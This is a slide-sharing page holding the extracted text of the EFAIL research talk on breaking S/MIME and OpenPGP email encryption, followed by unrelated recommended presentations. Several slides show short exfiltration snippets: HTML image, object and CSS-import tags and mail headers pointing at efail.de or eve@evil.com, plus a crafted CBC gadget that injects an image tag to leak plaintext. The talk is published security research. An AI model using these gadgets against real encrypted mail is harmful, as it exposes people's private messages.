efail
play

EFAIL BREAKING S/MIME AND OPENPGP EMAIL ENCRYPTION USING - PowerPoint PPT Presentation

Jul 12, 2023 •253 likes •675 views

EFAIL BREAKING S/MIME AND OPENPGP EMAIL ENCRYPTION USING EXFILTRATION CHANNELS mail@efail.de | https://www.efail.de 1 Mnster University of Applied Sciences Damian Poddebniak 1 , Christian Dresen 1 , Jens Mller 2 , Fabian Ising 1 , 2 Ruhr

  1. EFAIL BREAKING S/MIME AND OPENPGP EMAIL ENCRYPTION USING EXFILTRATION CHANNELS mail@efail.de | https://www.efail.de 1 Münster University of Applied Sciences Damian Poddebniak 1 , Christian Dresen 1 , Jens Müller 2 , Fabian Ising 1 , 2 Ruhr University Bochum Sebastian Schinzel 1 , Simon Friedberger 3 , Juraj Somorovsky 2 , Jörg Schwenk 2 3 NXP Semiconductors 22.11.18 EFAIL – Poddebniak, Dresen, Müller, Ising, Schinzel, Friedberger, Somorovsky, Schwenk 1

  2. Motivation for email encryption Nation state attackers • Massive collection of emails • Snowden revelations on pervasive surveillance Breach of email provider / email account • Single point of failure • Aren’t they reading / analyzing my emails anyway? Insecure transport • TLS might be used – we don’t know in advance! 22.11.18 EFAIL – Poddebniak, Dresen, Müller, Ising, Schinzel, Friedberger, Somorovsky, Schwenk 2

  3. Email e2e encryption TWO COMPETING STANDARDS OpenPGP (RFC 4880) • Favored by privacy advocates • Web-of-trust (no authorities) S/MIME (RFC 5751) • Favored by organizations • Multi root trust hierarchies 22.11.18 EFAIL – Poddebniak, Dresen, Müller, Ising, Schinzel, Friedberger, Somorovsky, Schwenk 3

  4. Security of email encryption Request/response protocols Email is non-interactive ? 22.11.18 EFAIL – Poddebniak, Dresen, Müller, Ising, Schinzel, Friedberger, Somorovsky, Schwenk 4

  5. Backchannel techniques Forcing an email client to send responses via backchannels • HTML/CSS <img src="http://efail.de"> <object data="ftp://efail.de"> • Email header <style>@import '//efail.de'</style> • Attachment preview ... • Certificate verification 22.11.18 EFAIL – Poddebniak, Dresen, Müller, Ising, Schinzel, Friedberger, Somorovsky, Schwenk 5

  6. Backchannel techniques Forcing an email client to send responses via backchannels • HTML/CSS Disposition-Notification-To: eve@evil.com Remote-Attachment-URL: http://efail.de • Email header X-Image-URL: http://efail.de • Attachment preview … • Certificate verification 22.11.18 EFAIL – Poddebniak, Dresen, Müller, Ising, Schinzel, Friedberger, Somorovsky, Schwenk 6

  7. Backchannel techniques Forcing an email client to send responses via backchannels • HTML/CSS • Email header • Attachment preview PDF, SVG, VCards, etc. • Certificate verification 22.11.18 EFAIL – Poddebniak, Dresen, Müller, Ising, Schinzel, Friedberger, Somorovsky, Schwenk 7

  8. Backchannel techniques Forcing an email client to send responses via backchannels • HTML/CSS • Email header • Attachment preview OCSP, CRL, intermediate certs • Certificate verification 22.11.18 EFAIL – Poddebniak, Dresen, Müller, Ising, Schinzel, Friedberger, Somorovsky, Schwenk 8

  9. Evaluation of backchannels in email clients Outlook Postbox Live Mail The Bat! eM Client W8Mail Windows IBM Notes Foxmail Pegasus Mulberry WLMail W10Mail KMail Claws Thunderbird Linux Evolution Trojitá Mutt User interaction Airmail MailMate Apple Mail macOS No user interaction Mail App Outlook CanaryMail iOS Leak via bypass K-9 Mail MailDroid Javascript execution Android R2Mail Nine GMail Yahoo! GMX Mail.ru ProtonMail Mailbox Webmail iCloud FastMail Mailfence ZoHo Mail HushMail Outlook.com Horde IMP Roundcube Exchange GroupWise Webapp RainLoop AfterLogic Mailpile 22.11.18 EFAIL – Poddebniak, Dresen, Müller, Ising, Schinzel, Friedberger, Somorovsky, Schwenk 9

  10. Evaluation of backchannels in email clients Outlook Postbox Live Mail The Bat! eM Client W8Mail Windows IBM Notes Foxmail Pegasus Mulberry WLMail W10Mail KMail Claws Thunderbird Linux Evolution Trojitá Mutt 40/47 clients have User interaction Airmail MailMate Apple Mail macOS No user interaction backchannels requiring Mail App Outlook CanaryMail iOS Leak via bypass no user interaction K-9 Mail MailDroid Javascript execution Android R2Mail Nine GMail Yahoo! GMX Mail.ru ProtonMail Mailbox Webmail iCloud FastMail Mailfence ZoHo Mail HushMail Outlook.com Horde IMP Roundcube Exchange GroupWise Webapp RainLoop AfterLogic Mailpile 22.11.18 EFAIL – Poddebniak, Dresen, Müller, Ising, Schinzel, Friedberger, Somorovsky, Schwenk 10

  11. Attacker model 22.11.18 EFAIL – Poddebniak, Dresen, Müller, Ising, Schinzel, Friedberger, Somorovsky, Schwenk 11

  12. Attacker model 22.11.18 EFAIL – Poddebniak, Dresen, Müller, Ising, Schinzel, Friedberger, Somorovsky, Schwenk 12

  13. S/MIME 22.11.18 EFAIL – Poddebniak, Dresen, Müller, Ising, Schinzel, Friedberger, Somorovsky, Schwenk 13

  14. Malleability of CBC C 1 C 2 C 0 decryption decryption P 1 P 0 22.11.18 EFAIL – Poddebniak, Dresen, Müller, Ising, Schinzel, Friedberger, Somorovsky, Schwenk 14

  15. Malleability of CBC C 1 C 2 C 0 0 0 1 0 1 0 1 0 decryption decryption 1 1 1 1 1 1 1 1 P 1 P 0 22.11.18 EFAIL – Poddebniak, Dresen, Müller, Ising, Schinzel, Friedberger, Somorovsky, Schwenk 15

  16. Malleability of CBC C 1 C 2 C 0 0 1 1 0 1 0 1 0 decryption decryption 1 1 1 1 1 1 1 1 P 1 P 0 22.11.18 EFAIL – Poddebniak, Dresen, Müller, Ising, Schinzel, Friedberger, Somorovsky, Schwenk 16

  17. Malleability of CBC C 1 C 2 C 0 0 1 1 0 1 0 1 0 decryption decryption 1 0 1 1 1 1 1 1 P 1 P 0 22.11.18 EFAIL – Poddebniak, Dresen, Müller, Ising, Schinzel, Friedberger, Somorovsky, Schwenk 17

  18. Malleability of CBC C 1 C 2 C 0 0 1 1 1 1 0 1 0 decryption decryption 1 0 1 1 1 1 1 1 P 1 P 0 22.11.18 EFAIL – Poddebniak, Dresen, Müller, Ising, Schinzel, Friedberger, Somorovsky, Schwenk 18

  19. Malleability of CBC C 1 C 2 C 0 0 1 1 1 1 0 1 0 decryption decryption 1 0 1 0 1 1 1 1 P 1 P 0 22.11.18 EFAIL – Poddebniak, Dresen, Müller, Ising, Schinzel, Friedberger, Somorovsky, Schwenk 19

  20. Malleability of CBC C 1 C 2 C 0 0 1 1 1 1 0 0 0 decryption decryption 1 0 1 0 1 1 1 1 P 1 P 0 22.11.18 EFAIL – Poddebniak, Dresen, Müller, Ising, Schinzel, Friedberger, Somorovsky, Schwenk 20

  21. Malleability of CBC C 1 C 2 C 0 0 1 1 1 1 0 0 0 decryption decryption 1 0 1 0 1 1 0 1 P 1 P 0 22.11.18 EFAIL – Poddebniak, Dresen, Müller, Ising, Schinzel, Friedberger, Somorovsky, Schwenk 21

  22. Malleability of CBC C 1 C 2 C 0 0 1 1 1 1 0 0 0 ? decryption decryption 1 0 1 0 1 1 0 1 P 1 P 0 22.11.18 EFAIL – Poddebniak, Dresen, Müller, Ising, Schinzel, Friedberger, Somorovsky, Schwenk 22

  23. Malleability of CBC C 1 C 2 C 0 decryption decryption Content-type: te xt/html\nDear Bob P 1 P 0 22.11.18 EFAIL – Poddebniak, Dresen, Müller, Ising, Schinzel, Friedberger, Somorovsky, Schwenk 23

  24. Malleability of CBC C 1 C 2 C 0 ' decryption decryption Z ontent-type: te xt/html\nDear Bob P 1 P 0 ' 22.11.18 EFAIL – Poddebniak, Dresen, Müller, Ising, Schinzel, Friedberger, Somorovsky, Schwenk 24

  25. Malleability of CBC C 1 C 2 C 0 ⊕ P 0 decryption decryption 0000000000000000 xt/html\nDear Bob P 1 P 0 ' CBC Gadget 22.11.18 EFAIL – Poddebniak, Dresen, Müller, Ising, Schinzel, Friedberger, Somorovsky, Schwenk 25

  26. Malleability of CBC C 1 C 2 C 0 ⊕ P 0 ⊕ P c decryption decryption <img src=”ev.il/ xt/html\nDear Bob P 1 P 0 ' 22.11.18 EFAIL – Poddebniak, Dresen, Müller, Ising, Schinzel, Friedberger, Somorovsky, Schwenk 26

  27. Malleability of CBC C 1 ' C 2 C 0 decryption decryption Content-type: te Z t/html\nDear Bob P 1 ' P 0 ' 22.11.18 EFAIL – Poddebniak, Dresen, Müller, Ising, Schinzel, Friedberger, Somorovsky, Schwenk 27

  28. Malleability of CBC C 1 ' C 2 C 0 decryption decryption ???????????????? Z t/html\nDear Bob P 1 ' P 0 ' 22.11.18 EFAIL – Poddebniak, Dresen, Müller, Ising, Schinzel, Friedberger, Somorovsky, Schwenk 28

  29. Attacking S/MIME No MAC 22.11.18 EFAIL – Poddebniak, Dresen, Müller, Ising, Schinzel, Friedberger, Somorovsky, Schwenk 29

  30. Attacking S/MIME 1 PRACTICAL ATTACK AGAINST S/MIME . 1 / P T T H . . . i w 0 2 Content-type: te xt/html\nDear Sir or Madam, the se % ecret meeting wi g n i t e e m 0 2 Original % t e r c e Crafted s 0 2 % e h t 0 2 ???????????????? <base " ???????????????? " href="http:"> % C 2 % m a d a M ???????????????? <img " ???????????????? " src="efail.de/ 0 2 % r o 0 2 % r Content-type: te xt/html\nDear Sir or Madam, the se ecret meeting wi i S 0 2 % r a e e ???????????????? D "> d . . . l . i / a f T e E G : t s o Reordering Duplicating Changing H 22.11.18 EFAIL – Poddebniak, Dresen, Müller, Ising, Schinzel, Friedberger, Somorovsky, Schwenk 30

  31. Practical attack against S/MIME ATTACKER MODEL 22.11.18 EFAIL – Poddebniak, Dresen, Müller, Ising, Schinzel, Friedberger, Somorovsky, Schwenk 31

  32. OpenPGP 22.11.18 EFAIL – Poddebniak, Dresen, Müller, Ising, Schinzel, Friedberger, Somorovsky, Schwenk 32

Download Presentation
Download Policy: The content available on the website is offered to you 'AS IS' for your personal information and use only. It cannot be commercialized, licensed, or distributed on other websites without prior consent from the author. To download a presentation, simply click this link. If you encounter any difficulties during the download process, it's possible that the publisher has removed the file from their server.

Recommend

Efail attack and it its im implications Juraj Somorovsky Damian Poddebniak 1 , Christian Dresen

Efail attack and it its im implications Juraj Somorovsky Damian Poddebniak 1 , Christian Dresen

Efail attack and it its im implications Juraj Somorovsky Damian Poddebniak 1 , Christian Dresen 1 , Jens Mller 2 , Fabian Ising 1 , Sebastian Schinzel 1 , Simon Friedberger 3 , Juraj Somorovsky 2 , Jrg Schwenk 2 About this talk Efail:

1.23k views • 94 slides
Attacking End-to-End Encrypted Emails Joint research with : Prof. Dr. Sebastian Schinzel Damian

Attacking End-to-End Encrypted Emails Joint research with : Prof. Dr. Sebastian Schinzel Damian

https://efail.de/ Attacking End-to-End Encrypted Emails Joint research with : Prof. Dr. Sebastian Schinzel Damian Poddebniak, Christian Dresen, Twitter: @seecurity Jens Mller, Fabian Ising, Simon Friedberger, Juraj Somorovsky, Jrg

1.01k views • 73 slides
Social Engineering Physical Security Autumn 2018 Tadayoshi (Yoshi) Kohno

Social Engineering Physical Security Autumn 2018 Tadayoshi (Yoshi) Kohno

CSE 484 / CSE M 584: Computer Security and Privacy EFAIL Social Engineering Physical Security Autumn 2018 Tadayoshi (Yoshi) Kohno yoshi@cs.Washington.edu Thanks to Dan Boneh, Dieter Gollmann, Dan Halperin, Ada Lerner, John Manferdelli, John

622 views • 32 slides
Imagine 2040 Transportation Part 2: How will we get there? F ina nc ia l Sc e na rio 1 (Ba se

Imagine 2040 Transportation Part 2: How will we get there? F ina nc ia l Sc e na rio 1 (Ba se

8/23/2018 You spoke. We listened. Tell Us More! A Planning Commission Metropolitan Planning Organization for Transportation Partnership in Coordination with the Transportation for Economic Development Initiative Imagine 2040 Transportation

605 views • 12 slides
Canterbury Homeowners Association Association Annual Meeting October 6, 2020 Chaucer Park

Canterbury Homeowners Association Association Annual Meeting October 6, 2020 Chaucer Park

Canterbury Homeowners Association Association Annual Meeting October 6, 2020 Chaucer Park Annual Meeting 2019-2020 Agenda Current HOA Board Members and Committee Chairs HOA Annual Reports - Financials - Architectural/Convent

246 views • 20 slides
National Association of SACREs Stronger Together: The Power of Community 24 th May 2018 Dr

National Association of SACREs Stronger Together: The Power of Community 24 th May 2018 Dr

National Association of SACREs Stronger Together: The Power of Community 24 th May 2018 Dr Vanessa Ogden CEO, Mulberry Schools Trust Headteacher MSfG Islamophobia in the Press Punish a Muslim Day 2018 The Role of RE in Schools

460 views • 14 slides
ENCOUNTER ENCOUNTER T H E G O S P E L A C C O R D I N G T O L U K E JESUS OF NAZARETH JESUS

ENCOUNTER ENCOUNTER T H E G O S P E L A C C O R D I N G T O L U K E JESUS OF NAZARETH JESUS

ENCOUNTER ENCOUNTER T H E G O S P E L A C C O R D I N G T O L U K E JESUS OF NAZARETH JESUS OF NAZARETH Silence Luke 1:5-25 The silence of God is still the presence of God. Waiting (Luke 1:5-7) Listening (Luke 1:8-17)

282 views • 15 slides
Early Twentieth-Century Fiction e20fic14.blogs.rutgers.edu Prof. Andrew Goldstone

Early Twentieth-Century Fiction e20fic14.blogs.rutgers.edu Prof. Andrew Goldstone

Early Twentieth-Century Fiction e20fic14.blogs.rutgers.edu Prof. Andrew Goldstone (andrew.goldstone@rutgers.edu) (Murray 019, Mondays 2:304:30) CA: Evan Dresman (evan.dresman@rutgers.edu) (36 Union St. 217, Wednesdays 12:002:00) October

511 views • 34 slides
Case Study Upton &amp; Co Married accountant stole 500,000 in tax money to fund luxury life and

Case Study Upton &amp; Co Married accountant stole 500,000 in tax money to fund luxury life and

Case Study Upton &amp; Co Married accountant stole 500,000 in tax money to fund luxury life and lavish lover with expensive gifts By CHRIS BROOKE UPDATED: 10:28, 10 February 2012 Victoria Fraenzel had no idea that Upton was a married

200 views • 4 slides
For Muswell Hill Primary School Phase 2 Conditions Works Introductions ! 1. Introductions

For Muswell Hill Primary School Phase 2 Conditions Works Introductions ! 1. Introductions

For Muswell Hill Primary School Phase 2 Conditions Works Introductions ! 1. Introductions Presented by: Senior Contracts Manager John Wood Conor Cruse-Bowles Project Surveyor 1 1. Introductions For Our Aim and Objective: Is to deliver

412 views • 13 slides
to JB 2019 Parents Briefing Monday, 2 September 2019 1 Objectives: To provide the

to JB 2019 Parents Briefing Monday, 2 September 2019 1 Objectives: To provide the

Zhenghua Primary School P5 Cultural Immersion Day Trip to JB 2019 Parents Briefing Monday, 2 September 2019 1 Objectives: To provide the opportunity for our students to learn about the culture of our neighbouring country and appreciate

700 views • 37 slides
A L I T T L E BI T I ha ve thre e a ma zing kids (F lic kr) ABOUT ME I lo ve

A L I T T L E BI T I ha ve thre e a ma zing kids (F lic kr) ABOUT ME I lo ve

6/ 24/ 2015 I KNOW WHAT YOU DID L AST SUMME R T he Woe s of Soc ia l Me dia Priva c y A L I T T L E BI T I ha ve thre e a ma zing kids (F lic kr) ABOUT ME I lo ve 80s music (Go o g le Pla y) I lo ve to re a

373 views • 19 slides
ADMX - the Axion Dark Matter eXperiment Daniel Bowring, on behalf of the ADMX collaboration

ADMX - the Axion Dark Matter eXperiment Daniel Bowring, on behalf of the ADMX collaboration

ADMX - the Axion Dark Matter eXperiment Daniel Bowring, on behalf of the ADMX collaboration APS-DPF 2017 31 July 2017 Axions and WIMPs WIMPs scatter as quanta Axions scatter as classical waves WIMP-nucleon Coherently oscillating

350 views • 21 slides
I am attaching the ppt and a png screen image. Of course, you can make the colors you want in

I am attaching the ppt and a png screen image. Of course, you can make the colors you want in

From: Stelly_David To: John Mullet Cc: Stelly_David David M.; Rooney Bill; Adam Helms; Bob Avant ; Steve Searcy; McCutchen Bill Subject: Re: Draft DARPA STO slides Date: Monday, October 12, 2009 2:21:40 PM Attachments: diagram4jm.png

575 views • 3 slides
UI Programming (part of this content is based on previous classes from Anastasia, S. Huot, M.

UI Programming (part of this content is based on previous classes from Anastasia, S. Huot, M.

UI Programming (part of this content is based on previous classes from Anastasia, S. Huot, M. Beaudouin-Lafon, N.Roussel, O.Chapuis) Assignment 1 is out! Design and implement an interactive tool for creating the layout of comic strips

1.05k views • 87 slides
WIMP interfaces Graphical interfaces WIMP: Window, Icons, Menus and Pointing Presentation GUIs:

WIMP interfaces Graphical interfaces WIMP: Window, Icons, Menus and Pointing Presentation GUIs:

Assignment 1 is out! Design and implement an interactive tool for creating the layout of comic strips UI Programming (part of this content is based on previous classes from Anastasia, S. Huot, M. Beaudouin-Lafon, N.Roussel, O.Chapuis)

484 views • 22 slides
Designing Applications that See Lecture 7: Object Recognition Dan Maynes-Aminzade 29 January

Designing Applications that See Lecture 7: Object Recognition Dan Maynes-Aminzade 29 January

stanford hci group / cs377s Designing Applications that See Lecture 7: Object Recognition Dan Maynes-Aminzade 29 January 2008 Designing Applications that See http://cs377s.stanford.edu Reminders Pick up graded Assignment #1 Assignment

682 views • 50 slides
Clustering Analysis Basics Ke Chen Reading: [Ch. 7, EA], [25.1, KPM] COMP24111 Machine Learning

Clustering Analysis Basics Ke Chen Reading: [Ch. 7, EA], [25.1, KPM] COMP24111 Machine Learning

Clustering Analysis Basics Ke Chen Reading: [Ch. 7, EA], [25.1, KPM] COMP24111 Machine Learning Outline Introduction Data Types and Representations Distance Measures Major Clustering Methodologies Summary 2 COMP24111

414 views • 29 slides
How a Newbie Can Start Building Wealth Through Real Estate A Free Webinar From Hosted by

How a Newbie Can Start Building Wealth Through Real Estate A Free Webinar From Hosted by

How a Newbie Can Start Building Wealth Through Real Estate A Free Webinar From Hosted by Brandon Turner! Co-host of the BiggerPockets Podcast WORKSHEET: www.BiggerPockets.com/930worksheet WORKSHEET: www.BiggerPockets.com/930worksheet

1.25k views • 109 slides
Feasibility of polyculture of blue shrimp Litopenaeus stylirostris with fish - goldline

Feasibility of polyculture of blue shrimp Litopenaeus stylirostris with fish - goldline

Feasibility of polyculture of blue shrimp Litopenaeus stylirostris with fish - goldline rabbitfish Siganus lineatus or mullet Mugil sp. - in a closed culture system: a mesocosm study 1 / 23 00001 - 00:00:01 Feasibility of polyculture of blue

551 views • 23 slides
Introduction to Human Computer Interaction Course on NPTEL, Spring 2018 Week 8 &amp; 9 Visual

Introduction to Human Computer Interaction Course on NPTEL, Spring 2018 Week 8 &amp; 9 Visual

Introduction to Human Computer Interaction Course on NPTEL, Spring 2018 Week 8 &amp; 9 Visual Design, Colors, Fitts Law, Gulfs Ponnurangam Kumaraguru (PK) Associate Professor ACM Distinguished &amp; TEDx Speaker Linkedin/in/ponguru/ 1

1.11k views • 59 slides
Visual Design Visual Design Objectives Gestalt Principles Creating Organization and Structure

Visual Design Visual Design Objectives Gestalt Principles Creating Organization and Structure

Visual Design Visual Design Objectives Gestalt Principles Creating Organization and Structure Typography UI Visual Design Objectives What are the goals of an effective interface? Information communication 1. - enforce desired relationships

1.16k views • 36 slides
Will the Semantic Web scale? New York Sheraton May 19th, 2004 Proposers: Panelists:

Will the Semantic Web scale? New York Sheraton May 19th, 2004 Proposers: Panelists:

Panel Discussion P3: Will the Semantic Web scale? New York Sheraton May 19th, 2004 Proposers: Panelists: Organizers: - Raphael Volz - Dr. Cathy Marshall - Raphael Volz - Carole Goble - Prof. Dr. Alon Y. Halevy - Daniel Oberle - Rudi

393 views • 23 slides
Building a Modern Security Engineering Team zane@signalsciences.com @zanelackey Who is this guy

Building a Modern Security Engineering Team zane@signalsciences.com @zanelackey Who is this guy

Building a Modern Security Engineering Team zane@signalsciences.com @zanelackey Who is this guy anyway? Built and led the Etsy Security Team Spoiler alert: what this presentation is about Co-founded Signal Sciences This talk is

814 views • 70 slides

More recommend